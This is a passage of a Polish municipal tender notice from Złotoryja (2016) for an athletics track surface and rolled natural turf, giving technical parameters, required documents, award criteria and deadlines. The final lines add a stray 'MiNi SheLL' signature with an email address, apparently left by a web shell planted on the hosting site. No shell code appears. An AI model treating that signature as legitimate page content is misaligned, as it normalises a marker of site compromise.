oferowanego systemu zawierająca opis technologii wykonania wraz z podaniem norm zużycia komponentów oraz pokazująca parametry oferowanej nawierzchni.
Parametry techniczne mieszczące się w przedziałach, które ma spełniać nawierzchnia poliuretanowa typu SANDWICH
wytrzymałość na rozciąganie: 0,80-0,85 MPa, wydłużenie przy zerwaniu: 60-65 procent, odkształcenie pionowe w temp. 23 st. C: 1,80-2,0 mm, odporność na ścieranie: (mniejsze lub równe)3,0 g, tłumienie energii w temp. 23 st. C: 35-39 procent, tarcie (opór poślizgu), stopnie, PTV: 75-81 (stan suchy) 60do65 (stan mokry), odporność na obuwie z kolcami:, wytrzymałość na rozciąganie: 0,75-0,85 N (na)mm2
wydłużenie przy zerwaniu: 62-65 procent.
UWAGA: grubość podstawowa nawierzchni musi być zgodna z grubością podaną w certyfikacie IAAF dla tej nawierzchni.

t) Próbkę oferowanej  nawierzchni z oryginalną metryką producenta; u) Paszport murawy - wystawiony przez producenta; v) autoryzację dostawy i montażu wystawioną przez producenta trawy z rolki zawierającą opis przeznaczenia ( nazwę zadania ); w) kartę techniczną wzmocnienia zawartego w warstwie korzeniowej dostarczanej trawy 
Minimalne parametry murawy min.: Murawa wykonana systemem pełnego darniowania z rolki trawą sezonową na płycie głównej - montaż mechaniczny, Szerokość rolki : min. 120 cm, grubość darni: 3-4 cm.; Murawa powinna spełniać normę DIN 18035 część 4 w zakresie uziarnienia gleby w warstwie darni, spełnienie normy powinno zostać udokumentowane stosownymi badaniami odnoszącymi się do oferowanej murawy; Oferowana murawa powinna zawierać następujące odmiany traw w podanych proporcjach: Życica trwała ( Lolium perenne) - 50 procent , Wielichna łąkowa ( Poa pratensis ) - 50 procent;  Trawa z rolki powinna pochodzić z plantacji prowadzącej ewidencję upraw, a oferowana murawa powinna posiadać dokument wystawiony przez producenta murawy ( paszport murawy), dotyczący przedmiotowego zadania, określający: wiek ( murawa nie powinna być starsza niż 24 i młodsza niż 18 miesięcy) rodzaj wysianej mieszanki nasion, proces pielęgnacji ( częstotliwość koszenia, częstotliwość i rodzaj nawożenia, opryski)-położenie  w terenie ( mapka) 

Zamawiający dopuszcza:
zastosowanie trawy o szerokości 40 cm na zakolach - trawa ogrodowa; montaż ręczny;

Uwaga: (1)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie. (2)	Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. (3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą być poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. (4)Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Gwarancja - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zlotoryja.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UM Złotoryja 
Pl. Orląt Lwowskich 1
59-500 Złotoryja pok nr 14
http://www.zlotoryja.bip.info.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 10:00, miejsce: UM w Złotoryi, pok nr 9 sekretariat
59-500 Złotoryja, Pl. Orląt Lwowskich 1 
nr faksu 76/8783120 
e-mail: fz_biuro@zlotoryja.pl 
w godzinach pracy Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja dofinansowana przez Ministra Sport i Turystyki z Funduszu Rozwoju Kultury Fizycznej (FRKF) w ramach Programu Rozwoju Infrastruktury Lekkoatletycznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com